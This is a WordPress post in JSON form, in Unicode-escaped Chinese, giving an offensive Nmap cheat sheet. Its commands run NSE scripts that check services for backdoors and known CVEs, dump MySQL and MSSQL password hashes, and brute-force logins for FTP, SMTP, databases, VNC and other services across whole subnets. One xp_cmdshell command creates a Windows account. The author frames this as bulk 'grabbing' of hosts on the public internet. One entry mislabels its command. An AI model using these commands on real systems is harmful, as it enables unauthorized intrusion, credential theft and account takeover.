{"id":1675,"date":"2024-05-08T17:34:35","date_gmt":"2024-05-08T09:34:35","guid":{"rendered":"http:\/\/oneai.eu.org\/?p=1675"},"modified":"2024-05-08T17:34:35","modified_gmt":"2024-05-08T09:34:35","slug":"nmap-%e8%bf%9b%e9%98%b6%e4%bd%bf%e7%94%a8","status":"publish","type":"post","link":"https:\/\/oneai.eu.org\/?p=1675","title":{"rendered":"Nmap \u8fdb\u9636\u4f7f\u7528"},"content":{"rendered":"<pre><code class=\"language-bash\">\u56e0\u4e3a\u4eca\u5929\u7684\u91cd\u70b9\u5e76\u975enmap\u672c\u8eab\u7684\u4f7f\u7528,\u4e3b\u8981\u8fd8\u662f\u60f3\u501f\u8fd9\u6b21\u673a\u4f1a\u7ed9\u5927\u5bb6\u4ecb\u7ecd\u4e00\u4e9b\u5728\u5b9e\u6218\u4e2d\u76f8\u5bf9\u6bd4\u8f83\u5b9e\u7528\u7684nmap\u811a\u672c,\u6240\u4ee5\u5173\u4e8enmap\u81ea\u8eab\u7684\u4e00\u4e9b\u57fa\u7840\u9009\u9879\u5c31\u4e0d\u591a\u8bf4\u4e86,\u8be6\u60c5\u53ef\u53c2\u8003\u535a\u5ba2\u7aef\u53e3\u6e17\u900f\u76f8\u5173\u6587\u7ae0,\u5e9f\u8bdd\u5c11\u8bf4,\u54b1\u4eec\u76f4\u63a5\u5f00\u59cb,\u5b9e\u9645\u4e2d\u6211\u4eec\u53ef\u4ee5\u5148\u7528\u4e0b\u9762\u7684\u8bed\u53e5,\u5927\u6982\u626b\u4e00\u773c\u76ee\u6807\u673a\u5668\u6216\u76ee\u6807C\u6bb5\u90fd\u8dd1\u4e86\u4ec0\u4e48\u670d\u52a1,\u5fc3\u91cc\u603b\u8981\u5148\u6709\u4e2a\u8c31,\u4e4b\u540e\u624d\u597d\u9488\u5bf9\u6027\u51fa\u724c\u561b\n\n# nmap -sV -sT -Pn --open -v 192.168.3.23\n\u5f53\u7136,\u4f60\u4e5f\u53ef\u4ee5\u7528\u4e0b\u9762\u7684\u811a\u672c\u5148\u5c1d\u8bd5\u83b7\u53d6\u4e0b\u76ee\u6807\u673a\u5668\u66f4\u8be6\u7ec6\u7684\u670d\u52a1banner\u4fe1\u606f[\u4e0d\u8fc7\u8fd9\u4e2a\u5e76\u4e0d\u8be6\u7ec6,\u6709\u65f6\u5019\u7b80\u5355telnet\u4e0b\u5c31\u76f4\u63a5\u80fd\u770b\u5230\u8be6\u7ec6\u7684banner\u4e86,\u7528\u4e0d\u7740nmap],\u770b\u5177\u4f53\u7248\u672c\u7684\u539f\u56e0\u662f\u56e0\u4e3a\u6709\u4e9b\u670d\u52a1\u5de5\u5177\u6f0f\u6d1e\u53ea\u80fd\u5229\u7528\u5728\u7279\u5b9a\u7684\u7248\u672c\u4e0a,\u6240\u4ee5,\u63d0\u524d\u77e5\u9053\u5927\u6982\u4e00\u4e0b\u8fd8\u662f\u975e\u5e38\u6709\u5fc5\u8981\u7684,\u5e9f\u8bdd\u5230\u6b64\u4e3a\u6b62,\u54b1\u4eec\u5f00\u59cb\u771f\u6b63\u7684\u5185\u5bb9\n\n# nmap -sT -Pn --open -v banner.nse 192.168.3.23\n0\u00d702 \u548cftp\u76f8\u5173\u7684\u4e00\u4e9b\u6f0f\u6d1e\u68c0\u6d4b\u811a\u672c\nftp-anon.nse        \u68c0\u67e5\u76ee\u6807ftp\u662f\u5426\u5141\u8bb8\u533f\u540d\u767b\u5f55,\u5149\u80fd\u767b\u9646\u8fd8\u4e0d\u591f,\u5b83\u8fd8\u4f1a\u81ea\u52a8\u68c0\u6d4b\u76ee\u5f55\u662f\u5426\u53ef\u8bfb\u5199,\u6bd4\u5982\u4f60\u60f3\u5feb\u901f\u6279\u91cf\u6293\u4e00\u4e9bftp\n\n# nmap -p 21 --script ftp-anon.nse -v 192.168.3.23\nftp-brute.nse        ftp\u7206\u7834\u811a\u672c[\u9ed8\u8ba4\u53ea\u4f1a\u5c1d\u8bd5\u4e00\u4e9b\u6bd4\u8f83\u7b80\u5355\u7684\u5f31\u53e3\u4ee4,\u65f6\u95f4\u53ef\u80fd\u8981\u7a0d\u5fae\u957f\u4e00\u4e9b(\u6302vpn\u4ee5\u540e\u8fd9\u4e2a\u901f\u5ea6\u53ef\u80fd\u8fd8\u4f1a\u66f4\u6162),\u6bd5\u7adf,\u662f\u76f4\u63a5\u5728\u516c\u7f51\u7206\u7834]\n\n# nmap -p 21 --script ftp-brute.nse -v 192.168.3.23\nftp-vuln-cve2010-4221.nse    ProFTPD 1.3.3c\u4e4b\u524d\u7684netio.c\u6587\u4ef6\u4e2d\u7684pr_netio_telnet_gets\u51fd\u6570\u4e2d\u5b58\u5728\u591a\u4e2a\u6808\u6ea2\u51fa\n\n# nmap -p 21 --script ftp-vuln-cve2010-4221.nse -v 192.168.3.23\nftp-proftpd-backdoor.nse    ProFTPD 1.3.3c \u88ab\u4eba\u63d2\u540e\u95e8[proftpd-1.3.3c.tar.bz2],\u7f3a\u7701\u53ea\u6267\u884cid\u547d\u4ee4,\u53ef\u81ea\u884c\u5230\u811a\u672c\u4e2d\u5b83\u6362\u6210\u80fd\u76f4\u63a5\u5f39shell\u7684\u547d\u4ee4\n\n# nmap -p 21 --script ftp-vuln-cve2010-4221.nse -v 192.168.3.23\nftp-vsftpd-backdoor.nse    VSFTPD v2.3.4 \u8ddfProftp\u540c\u6837\u7684\u95ee\u9898,\u88ab\u4eba\u6345\u8fdb\u53bb\u4ee5\u540e\u5728\u4ee3\u7801\u91cc\u9762\u63d2\u4e86\u540e\u95e8\n\n# nmap -p 21 --script ftp-vsftpd-backdoor.nse -v 192.168.3.23\n0\u00d703 \u548cssh \u76f8\u5173\u7684\u4e00\u4e9b\u626b\u63cf\u811a\u672c\nsshv1.nse    \u5927\u5bb6\u90fd\u77e5\u9053\u7684,sshv1\u662f\u53ef\u4ee5\u88ab\u4e2d\u95f4\u4eba\u7684\n\n# nmap -p 22 --script sshv1.nse -v 192.168.3.23\n0\u00d704 \u548csmtp,pop3,imap\u76f8\u5173\u7684\u4e00\u4e9b\u626b\u63cf\u811a\u672c\nsmtp-brute.nse   \u7b80\u5355\u7206\u7834smtp\u5f31\u53e3\u4ee4,\u62ff\u8fd9\u4e2a\u7206\u8fdb\u53bb\u7684\u90ae\u7bb1\u7ed9\u4eba\u53d1\u4fe1\u4e5f\u8bb8\u6210\u529f\u7387\u4f1a\u7a0d\u5fae\u9ad8\u4e00\u70b9\n\n# nmap -p 25 --script smtp-brute.nse -v 192.168.3.23\nsmtp-enum-users.nse  \u679a\u4e3e\u76ee\u6807smtp\u670d\u52a1\u5668\u7684\u90ae\u4ef6\u7528\u6237\u540d,\u524d\u63d0\u662f\u76ee\u6807\u8981\u5b58\u5728\u6b64\u9519\u8bef\u914d\u7f6e\u624d\u884c,\u641c\u96c6\u4e00\u4e9b\u5fc5\u8981\u7684\u4fe1\u606f\u8fd8\u662f\u86ee\u597d\u7684\n\n# nmap -p 25 --script smtp-enum-users.nse -v 192.168.3.23\nsmtp-vuln-cve2010-4344.nse    Exim 4.70\u4e4b\u524d\u7248\u672c\u4e2d\u7684string.c\u6587\u4ef6\u4e2d\u7684string_vformat\u51fd\u6570\u4e2d\u5b58\u5728\u5806\u6ea2\u51fa\n\n# nmap -p 25 --script smtp-vuln-cve2010-4344.nse -v 192.168.3.23\nsmtp-vuln-cve2011-1720.nse     Postfix 2.5.13\u4e4b\u524d\u7248\u672c\uff0c2.6.10\u4e4b\u524d\u76842.6.x\u7248\u672c\uff0c2.7.4\u4e4b\u524d\u76842.7.x\u7248\u672c\u548c2.8.3\u4e4b\u524d\u76842.8.x\u7248\u672c,\u5b58\u5728\u6ea2\u51fa\n\n# nmap -p 25 --script smtp-vuln-cve2011-1720.nse -v 192.168.3.23\nsmtp-vuln-cve2011-1764.nse     Exim dkim_exim_verify_finish() \u5b58\u5728\u683c\u5f0f\u5b57\u7b26\u4e32\u6f0f\u6d1e,\u592a\u8001\u73b0\u5728\u57fa\u672c\u5f88\u96be\u9047\u5230\u4e86\n\n# nmap -p 25 --script smtp-vuln-cve2011-1764.nse -v 192.168.3.23\npop3-brute.nse    pop\u7b80\u5355\u5f31\u53e3\u4ee4\u7206\u7834\n\n# nmap -p 110 --script pop3-brute.nse -v 192.168.3.23\nimap-brute.nse    imap\u7b80\u5355\u5f31\u53e3\u4ee4\u7206\u7834\n\n# nmap -p 143,993 --script imap-brute.nse -v 192.168.3.23\n0\u00d705 \u548cdns \u76f8\u5173\u7684\u4e00\u4e9b\u6f0f\u6d1e\u626b\u63cf\u811a\u672c\ndns-zone-transfer.nse        \u68c0\u67e5\u76ee\u6807ns\u670d\u52a1\u5668\u662f\u5426\u5141\u8bb8\u4f20\u9001,\u5982\u679c\u80fd,\u76f4\u63a5\u628a\u5b50\u57df\u62d6\u51fa\u6765\u5c31\u597d\u4e86\n\n# nmap -p 53 --script dns-zone-transfer.nse -v 192.168.3.23\n# nmap -p 53 --script dns-zone-transfer.nse --script-args dns-zone-transfer.domain=target.org -v 192.168.3.23\nhostmap-ip2hosts.nse   \u65c1\u7ad9\u67e5\u8be2,\u76ee\u6d4b\u4e86\u4e00\u4e0b\u811a\u672c,\u7528\u7684ip2hosts\u7684\u63a5\u53e3,\u4e0d\u8fc7\u8be5\u63a5\u53e3\u4f3c\u4e4e\u65e9\u5df2\u505c\u7528,\u5982\u679c\u60f3\u7ee7\u7eed\u7528,\u53ef\u81ea\u884c\u5230\u811a\u672c\u91cc\u628a\u63a5\u53e3\u90e8\u5206\u7684\u4ee3\u7801\u6539\u6389\n\n# nmap -p80 --script hostmap-ip2hosts.nse 192.168.3.23\n0\u00d706 \u548c\u5404\u79cd\u6570\u636e\u5e93\u76f8\u5173\u7684\u4e00\u4e9b\u626b\u63cf\u811a\u672c\ninformix-brute.nse   informix\u7206\u7834\u811a\u672c\n\n# nmap -p 9088 --script informix-brute.nse 192.168.3.23\nmysql-empty-password.nse   mysql \u626b\u63cfroot\u7a7a\u5bc6\u7801,\u6bd4\u5982\u4f60\u60f3\u6279\u91cf\u6293mysql\n\n# nmap -p 3306 --script mysql-empty-password.nse -v 192.168.3.23\nmysql-brute.nse    mysql root\u5f31\u53e3\u4ee4\u7b80\u5355\u7206\u7834\n\n# nmap -p 3306 --script mysql-brute.nse -v 192.168.3.23\nmysql-dump-hashes.nse    \u5bfc\u51famysql\u4e2d\u6240\u6709\u7528\u6237\u7684hash\n\n# nmap -p 3306 --script mysql-dump-hashes --script-args=&#039;username=root,password=root&#039; 192.168.3.23\nmysql-vuln-cve2012-2122.nse   Mysql\u8eab\u4efd\u8ba4\u8bc1\u6f0f\u6d1e[MariaDB and MySQL  5.1.61,5.2.11, 5.3.5, 5.5.22],\u5229\u7528\u6761\u4ef6\u6709\u4e9b\u82db\u523b [\u9700\u8981\u76ee\u6807\u7684mysql\u662f\u81ea\u5df1\u6e90\u7801\u7f16\u8bd1\u5b89\u88c5\u7684,\u8fd9\u6837\u7684\u6210\u529f\u7387\u76f8\u5bf9\u8f83\u9ad8]\n\n# nmap -p 3306 --script mysql-vuln-cve2012-2122.nse  -v 192.168.3.23\n# nmap -p 445 --script ms-sql-info.nse -v 203.124.11.0\/24      ms-sql-info.nse \u626b\u63cfC\u6bb5mssql\n# nmap -p 1433 --script ms-sql-info.nse --script-args mssql.instance-port=1433 -v 192.168.3.0\/24\nms-sql-empty-password.nse \u626b\u63cfmssql sa\u7a7a\u5bc6\u7801,\u6bd4\u5982\u4f60\u60f3\u6279\u91cf\u6293mssql\n\n# nmap -p 1433 --script ms-sql-empty-password.nse -v 192.168.3.0\/24\nms-sql-brute.nse    sa\u5f31\u53e3\u4ee4\u7206\u7834\n\n# nmap -p 1433 --script ms-sql-brute.nse -v 192.168.3.0\/24\nms-sql-xp-cmdshell.nse   \u5229\u7528xp_cmdshell,\u8fdc\u7a0b\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\n\n# nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd=net user test test add 192.168.3.0\/24\nms-sql-dump-hashes.nse    \u5bfc\u51famssql\u4e2d\u6240\u6709\u7684\u6570\u636e\u5e93\u7528\u6237\u53ca\u5bc6\u7801hash\n\n# nmap -p 1433 --script ms-sql-dump-hashes -v 192.168.3.0\/24\npgsql-brute.nse   \u5c1d\u8bd5\u7206\u7834postgresql\n\n# nmap -p 5432 --script pgsql-brute -v 192.168.3.0\/24\noracle-brute-stealth.nse  \u5c1d\u8bd5\u7206\u7834oracle\n\n# nmap --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL  -v 192.168.3.0\/24\noracle-brute.nse\n\n# nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL -v 192.168.3.0\/24\nmongodb-brute.nse   \u5c1d\u8bd5\u7206\u7834mongdb\n\n# nmap -p 27017  --script mongodb-brute 192.168.3.0\/24\nredis-brute.nse   redis\u7206\u7834\n\n# nmap -p 6379 --script redis-brute.nse 192.168.3.0\/24\n0\u00d707 \u548csnmp\u76f8\u5173\u7684\u4e00\u4e9b\u626b\u63cf\u811a\u672c,\u7528\u6765\u641c\u96c6\u4e9b\u5185\u7f51\u4fe1\u606f\u8fd8\u884c,\u8fd0\u6c14\u597d\u4e5f\u8bb8\u8fd8\u80fd\u67e5\u5230\u8d26\u53f7\u5bc6\u7801\u4ec0\u4e48\u7684\nsnmp-brute.nse   \u7206\u7834C\u6bb5\u7684snmp \n\n# nmap -sU --script snmp-brute --script-args snmp-brute.communitiesdb=user.txt 192.168.3.0\/24\n0\u00d708 \u548ctelnet\u76f8\u5173\u7684\u4e00\u4e9b\u626b\u63cf\u811a\u672c\ntelnet-brute.nse   \u7b80\u5355\u7206\u7834telnet\n\n# nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s -v 192.168.3.0\/24\n0\u00d709 \u548cldap\u670d\u52a1\u76f8\u5173\u7684\u4e00\u4e9b\u5229\u7528\u811a\u672c\nldap-brute.nse   \u7b80\u5355\u7206\u7834ldap\n\n# nmap -p 389 --script ldap-brute --script-args ldap.base=&#039;cn=users,dc=cqure,dc=net&#039; 192.168.3.0\/24\n0\u00d710 \u548c\u5404\u7c7bweb\u4e2d\u95f4\u4ef6,web\u96c6\u6210\u73af\u5883\u76f8\u5173\u7684\u4e00\u4e9b\u5229\u7528\u811a\u672c\nxmpp-brute.nse   xmpp\u7206\u7834\n\n# nmap -p 5222 --script xmpp-brute.nse  192.168.3.0\/24\nhttp-iis-short-name-brute.nse  \u77ed\u6587\u4ef6\u626b\u63cf\n\n# nmap -p80 --script http-iis-short-name-brute.nse 192.168.3.0\/24\nhttp-iis-webdav-vuln.nse  iis 5.0 6.0 webadv\u5199\n\n# nmap --script http-iis-webdav-vuln.nse -p80,8080 192.168.3.0\/24\nhttp-shellshock.nse bash\u8fdc\u7a0b\u6267\u884c\n\n# nmap -sV -p- --script http-shellshock --script-args uri=cgi-binbin,cmd=ls 192.168.3.0\/24\nhttp-svn-info.nse           \u63a2\u6d4b\u76ee\u6807svn\n\n# nmap --script http-svn-info 192.168.3.0\/24\nhttp-drupal-enum.nse           \u5176\u5b9e\u5bf9\u4e8e\u8fd9\u7c7b\u7684\u5f00\u6e90\u7a0b\u5e8f,\u6211\u4eec\u6839\u672c\u6ca1\u5fc5\u8981\u7528nmap,\u56e0\u4e3a\u641e\u591a\u4e86,\u5dee\u4e0d\u591a\u4e00\u773c\u5c31\u80fd\u770b\u51fa\u6765\n\nhttp-wordpress-brute.nse\n\n# nmap -p80 -sV --script http-wordpress-brute --script-args &#039;userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com,http-wordpress-brute.threads=3,brute.firstonly=true&#039; 192.168.3.0\/24\nhttp-backup-finder.nse   \u626b\u63cf\u76ee\u6807\u7f51\u7ad9\u5907\u4efd\n\n# nmap -p80 --script=http-backup-finder 192.168.3.0\/24\nhttp-vuln-cve2015-1635.nse   iis6.0\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\n\n# nmap -sV --script http-vuln-cve --script-args uri=&#039;anotheruri&#039;  192.168.3.0\/24\n0\u00d711 \u8ddfvpn\u76f8\u5173\u7684\u4e00\u4e9b\u5229\u7528\u811a\u672c\npptp-version.nse  \u8bc6\u522b\u76ee\u6807pptp\u7248\u672c,\u6682\u65f6\u53ea\u770b\u5230\u4e00\u4e2apptp\u6682\u65f6\u8fd8\u597d\u4f7f,\u5176\u5b9epptp\u4e5f\u662f\u53ef\u4ee5\u7206\u7834\u7684,\u563f\u563f\u2026\u2026\u4e0d\u8fc7,\u5b9e\u9645\u76ee\u6807\u4e2d,pptp\u51e0\u4e4e\u6ca1\u6709,openvpn\u504f\u591a,\u60f3\u76f4\u63a5\u6345\u76ee\u6807\u5185\u7f51,\u8fd9\u65e0\u7591\u662f\u5f88\u4e0d\u9519\u7684\u5165\u53e3\n\n# nmap -p 1723 --script pptp-version.nse 192.168.3.0\/24\n0\u00d712 smb\u6f0f\u6d1e\u68c0\u6d4b\u811a\u672c\u96c6\nsmb-vuln-ms08-067.nse\nsmb-vuln-ms10-054.nse\nsmb-vuln-ms10-061.nse\nsmb-vuln-ms17-010.nse  smb\u8fdc\u7a0b\u6267\u884c\n# nmap -p445 --script smb-vuln-ms17-010.nse 192.168.3.0\/24\n0\u00d713 \u68c0\u6d4b\u5185\u7f51\u55c5\u63a2,\u5b9e\u9645\u6d4b\u8bd5\u4e2d,\u8c8c\u4f3c\u5e76\u6ca1\u4ec0\u4e48\u5375\u7528,\u96be\u9053\u662f\u6211\u5b9e\u9a8c\u6709\u8bef :(\n\nsniffer-detect.nse\n# nmap -sn -Pn --script sniffer-detect.nse 192.168.3.0\/24\n0\u00d714 \u5176\u5b83\u7684\u4e00\u4e9b\u8f85\u52a9\u6027\u811a\u672c,\u5176\u5b9e\u6709\u4e9b\u5b9e\u9645\u7528\u9014\u53ef\u80fd\u5e76\u4e0d\u5927,\u5927\u5bb6\u9009\u62e9\u6027\u7684\u7528\u6781\u597d\u4e86\n\nrsync-brute.nse \u7206\u7834\u76ee\u6807\u7684rsync\n# nmap -p 873 --script rsync-brute --script-args &#039;rsync-brute.module=www&#039; 192.168.3.0\/24\nrlogin-brute.nse \u7206\u7834\u76ee\u6807\u7684rlogin\n# nmap -p 513 --script rlogin-brute 192.168.3.0\/24\nvnc-brute.nse  \u7206\u7834\u76ee\u6807\u7684vnc\n# nmap --script vnc-brute -p 5900 192.168.3.0\/24\npcanywhere-brute.nse \u7206\u7834pcanywhere\n# nmap -p 5631 --script=pcanywhere-brute 192.168.3.0\/24\nnessus-brute.nse \u7206\u7834nessus,\u8c8c\u4f3c\u73b0\u5728\u5df2\u7ecf\u4e0d\u662f1241\u7aef\u53e3\u4e86,\u5b9e\u5728\u662f\u592a\u8001\u4e86,\u76f4\u63a5\u5ffd\u7565\u5427\n# nmap --script nessus-brute -p 1241 192.168.3.0\/24\nnexpose-brute.nse        \u7206\u7834nexpose\n# nmap --script nexpose-brute -p 3780 192.168.3.0\/24\nshodan-api.nse  \u914d\u5408shodan\u63a5\u53e3\u8fdb\u884c\u626b\u63cf,\u5982\u679c\u81ea\u5df1\u624b\u91cc\u67090day,\u914d\u5408\u7740\u4e00\u8d77\u7528,\u8fd9\u4e2a\u5a01\u529b\u8fd8\u662f\u4e0d\u53ef\u5c0f\u89d1\u7684,\u4e0d\u8fc7\u5728\u5373\u5b9e\u9645\u6d4b\u7684\u65f6\u5019\u8c8c\u4f3c\u8fd8\u6709\u4e9b\u95ee\u9898\n# nmap --script shodan-api --script-args &#039;shodan-api.target=192.168.3.0\/24,shodan-api.apikey=SHODANAPIKEY&#039;\n0\u00d715 \u5c1d\u8bd5\u5229\u7528nmap\u4e00\u53e5\u8bdd\u5bf9\u76ee\u6807C\u6bb5\u8fdb\u884c\u5e38\u89c4\u6f0f\u6d1e\u626b\u63cf\n\n\u5b9e\u9645\u6d4b\u8bd5\u4e2d,\u4f1a\u975e\u5e38\u7684\u6162,\u53ef\u80fd\u8dd1\u4e00\u4e2a\u811a\u672c\u9a8c\u8bc1\u65f6\u95f4\u90fd\u8981\u5f88\u957f,\u5c24\u5176\u5728\u4f60\u7684vps\u5e26\u5bbd\u4e0d\u662f\u5f88\u8db3,\u7f51\u7edc\u53c8\u4e0d\u600e\u4e48\u597d\u7684\u65f6\u5019,\u901f\u5ea6\u5c31\u66f4\u6162\u4e86,\u6240\u4ee5\u8fd8\u662f\u5efa\u8bae\u5148\u5927\u81f4\u626b\u4e00\u773c\u76ee\u6807\u670d\u52a1,\u7136\u540e\u518d\u5355\u72ec\u9488\u5bf9\u6027\u7684\u626b,\u8fd9\u6837\u5b9e\u9645\u7684\u6210\u529f\u7387\u53ef\u80fd\u4f1a\u9ad8\u5f88\u591a,\u6bd5\u7adf,\u4e0d\u662f\u50cfmasscan\u6216\u8005zamp\u8fd9\u79cd\u57fa\u4e8e\u65e0\u72b6\u6001\u7684\u626b\u63cf\n\n# nmap -sT -Pn -v --script dns-zone-transfer.nse,ftp-anon.nse,ftp-proftpd-backdoor.nse,ftp-vsftpd-backdoor.nse,ftp-vuln-cve2010-4221.nse,http-backup-finder.nse,http-cisco-anyconnect.nse,http-iis-short-name-brute.nse,http-put.nse,http-php-version.nse,http-shellshock.nse,http-robots.txt.nse,http-svn-enum.nse,http-webdav-scan.nse,iis-buffer-overflow.nse,iax2-version.nse,memcached-info.nse,mongodb-info.nse,msrpc-enum.nse,ms-sql-info.nse,mysql-info.nse,nrpe-enum.nse,pptp-version.nse,redis-info.nse,rpcinfo.nse,samba-vuln-cve-2012-1182.nse,smb-vuln-ms08-067.nse,smb-vuln-ms17-010.nse,snmp-info.nse,sshv1.nse,xmpp-info.nse,tftp-enum.nse,teamspeak2-version.nse 192.168.3.0\/24\n\u5c1d\u8bd5\u5229\u7528nmap\u4e00\u53e5\u8bdd\u5bf9\u76ee\u6807\u8fdb\u884cC\u6bb5\u5f31\u53e3\u4ee4\u7206\u7834,\u8fd8\u662f\u4e0a\u9762\u7684\u95ee\u9898,\u9a8c\u8bc1\u4e00\u4e2a\u6f0f\u6d1e\u90fd\u8981\u90a3\u4e48\u4e45,\u66f4\u4e0d\u8981\u8bf4\u8dd1\u5b8c\u4e00\u4e2a\u5f31\u53e3\u4ee4\u5b57\u5178,nmap\u9ed8\u8ba4\u7684\u5f31\u53e3\u4ee4\u5b57\u5178\u5927\u6982\u662f5000\u5de6\u53f3,\u4e5f\u5c31\u662f\u8bf4\u4e00\u4e2a\u7528\u6237\u540d\u5c31\u8981\u8dd1\u5927\u69825000\u6b21,\u4f30\u8ba1\u4f60vps\u5e26\u5bbd\u518d\u5c0f\u70b9\u513f\u7684\u8bdd,\u8fd9\u4e2a\u5c31\u6ca1\u4ec0\u4e48\u8c31\u4e86,\u6bd5\u7adf\u6211\u4eec\u662f\u5728\u516c\u7f51,\u4e0d\u662f\u5728\u5185\u7f51,\u6240\u4ee5,\u8fd8\u662f\u5efa\u8bae\u6700\u597d\u4e0d\u8981\u540c\u65f6\u52a0\u8f7d\u5f88\u591a\u4e2a\u5f31\u53e3\u4ee4\u7206\u7834\u811a\u672c,\u5982\u679c\u5b9e\u5728\u6ca1\u529e\u6cd5\u5fc5\u987b\u7206\u7834,\u53ef\u4ee5\u591a\u82b1\u70b9\u513f\u65f6\u95f4,\u53bb\u641c\u96c6\u76ee\u6807\u6709\u4ef7\u503c\u7684\u7528\u6237\u540d,\u4ee5\u6b64\u5c3d\u53ef\u80fd\u63d0\u9ad8\u81ea\u5df1\u7684\u547d\u4e2d\u7387\n\n# nmap -sT -v -Pn --script ftp-brute.nse,imap-brute.nse,smtp-brute.nse,pop3-brute.nse,mongodb-brute.nse,redis-brute.nse,ms-sql-brute.nse,rlogin-brute.nse,rsync-brute.nse,mysql-brute.nse,pgsql-brute.nse,oracle-sid-brute.nse,oracle-brute.nse,rtsp-url-brute.nse,snmp-brute.nse,svn-brute.nse,telnet-brute.nse,vnc-brute.nse,xmpp-brute.nse 192.168.3.0\/24\n\u540e\u8bdd:\n    \u7531\u4e8enmap\u5185\u7f6e\u4e30\u5bcc\u7684\u6f0f\u6d1e\u626b\u63cf\u811a\u672c,\u4e5f\u4f7f\u5f97nmap\u7684\u80fd\u529b\u5728\u4e00\u5b9a\u7a0b\u5ea6\u5f97\u5230\u4e86\u6781\u5927\u7684\u6269\u5c55,\u610f\u5473\u8005\u6211\u4eec\u5b8c\u5168\u53ef\u4ee5\u81ea\u5df1\u6309\u7167nmap\u4e8b\u5148\u89c4\u5b9a\u597d\u7684\u8bed\u6cd5\u6765\u6a21\u4eff\u5b9e\u73b0\u4e00\u4e9b\u7b80\u5355\u7684\u5b9a\u5236\u626b\u63cf,\u8fd9\u4e5f\u662f\u8ba9\u6211\u611f\u89c9nmap\u505a\u7684\u975e\u5e38\u597d\u7684\u4e00<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u56e0\u4e3a\u4eca\u5929\u7684\u91cd\u70b9\u5e76\u975enmap\u672c\u8eab\u7684\u4f7f\u7528,\u4e3b\u8981\u8fd8\u662f\u60f3\u501f\u8fd9\u6b21\u673a\u4f1a\u7ed9\u5927\u5bb6\u4ecb\u7ecd\u4e00\u4e9b\u5728\u5b9e\u6218\u4e2d\u76f8\u5bf9\u6bd4\u8f83\u5b9e\u7528\u7684nmap\u811a\u672c,\u6240\u4ee5\u5173\u4e8enmap\u81ea\u8eab\u7684\u4e00\u4e9b\u57fa\u7840\u9009\u9879\u5c31\u4e0d\u591a\u8bf4\u4e86,\u8be6\u60c5\u53ef\u53c2\u8003\u535a\u5ba2\u7aef\u53e3\u6e17\u900f\u76f8\u5173\u6587\u7ae0,\u5e9f\u8bdd\u5c11\u8bf4,\u54b1\u4eec\u76f4\u63a5\u5f00\u59cb,\u5b9e\u9645\u4e2d\u6211\u4eec\u53ef\u4ee5\u5148\u7528\u4e0b\u9762\u7684\u8bed\u53e5,\u5927\u6982\u626b\u4e00\u773c\u76ee\u6807\u673a\u5668\u6216\u76ee\u6807C\u6bb5\u90fd\u8dd1\u4e86\u4ec0\u4e48\u670d\u52a1,\u5fc3\u91cc\u603b\u8981\u5148\u6709\u4e2a\u8c31,\u4e4b\u540e\u624d\u597d\u9488\u5bf9\u6027\u51fa\u724c\u561b # nmap -sV -sT -Pn &#8211;open -v 192.168.3.23 \u5f53\u7136,\u4f60\u4e5f\u53ef\u4ee5\u7528\u4e0b\u9762\u7684\u811a\u672c\u5148\u5c1d\u8bd5\u83b7\u53d6\u4e0b\u76ee\u6807\u673a\u5668\u66f4\u8be6\u7ec6\u7684\u670d\u52a1banner\u4fe1\u606f[\u4e0d\u8fc7\u8fd9\u4e2a\u5e76\u4e0d\u8be6\u7ec6,\u6709\u65f6\u5019\u7b80\u5355telnet\u4e0b\u5c31\u76f4\u63a5\u80fd\u770b\u5230\u8be6\u7ec6\u7684banner\u4e86,\u7528\u4e0d\u7740nmap],\u770b\u5177\u4f53\u7248\u672c\u7684\u539f\u56e0\u662f\u56e0\u4e3a\u6709\u4e9b\u670d\u52a1\u5de5\u5177\u6f0f\u6d1e\u53ea\u80fd\u5229\u7528\u5728\u7279\u5b9a\u7684\u7248\u672c\u4e0a,\u6240\u4ee5,\u63d0\u524d\u77e5\u9053\u5927\u6982\u4e00\u4e0b\u8fd8\u662f\u975e\u5e38\u6709\u5fc5\u8981\u7684,\u5e9f\u8bdd\u5230\u6b64\u4e3a\u6b62,\u54b1\u4eec\u5f00\u59cb\u771f\u6b63\u7684\u5185\u5bb9 # nmap -sT -Pn &#8211;open -v banner.nse 192.168.3.23 0\u00d702 \u548cftp\u76f8\u5173\u7684\u4e00\u4e9b\u6f0f\u6d1e\u68c0\u6d4b\u811a\u672c ftp-anon.nse \u68c0\u67e5\u76ee\u6807ftp\u662f\u5426\u5141\u8bb8\u533f\u540d\u767b\u5f55,\u5149\u80fd\u767b\u9646\u8fd8\u4e0d\u591f,\u5b83\u8fd8\u4f1a\u81ea\u52a8\u68c0\u6d4b\u76ee\u5f55\u662f\u5426\u53ef\u8bfb\u5199,\u6bd4\u5982\u4f60\u60f3\u5feb\u901f\u6279\u91cf\u6293\u4e00\u4e9bftp # nmap -p 21 &#8211;script ftp-anon.nse -v 192.168.3.23 ftp-brute.nse ftp\u7206\u7834\u811a\u672c[\u9ed8\u8ba4\u53ea\u4f1a\u5c1d\u8bd5\u4e00\u4e9b\u6bd4\u8f83\u7b80\u5355\u7684\u5f31\u53e3\u4ee4,\u65f6\u95f4\u53ef\u80fd\u8981\u7a0d\u5fae\u957f\u4e00\u4e9b(\u6302vpn\u4ee5\u540e\u8fd9\u4e2a\u901f\u5ea6\u53ef\u80fd\u8fd8\u4f1a\u66f4\u6162),\u6bd5\u7adf,\u662f\u76f4\u63a5\u5728\u516c\u7f51\u7206\u7834] # nmap -p 21 &#8211;script ftp-brute.nse -v 192.168.3.23 ftp-vuln-cve2010-4221.nse ProFTPD 1.3.3c\u4e4b\u524d\u7684netio.c\u6587\u4ef6\u4e2d\u7684pr_netio_telnet_gets\u51fd\u6570\u4e2d\u5b58\u5728\u591a\u4e2a\u6808\u6ea2\u51fa # nmap -p 21 &#8211;script ftp-vuln-cve2010-4221.nse -v 192.168.3.23 ftp-proftpd-backdoor.nse ProFTPD 1.3.3c 